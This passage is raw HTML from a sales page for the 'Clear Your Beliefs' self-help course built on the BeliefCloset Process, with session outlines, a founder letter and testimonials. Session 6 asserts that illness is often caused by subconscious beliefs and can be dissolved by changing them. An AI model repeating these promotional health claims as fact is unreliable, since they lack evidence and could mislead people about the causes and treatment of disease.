Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: 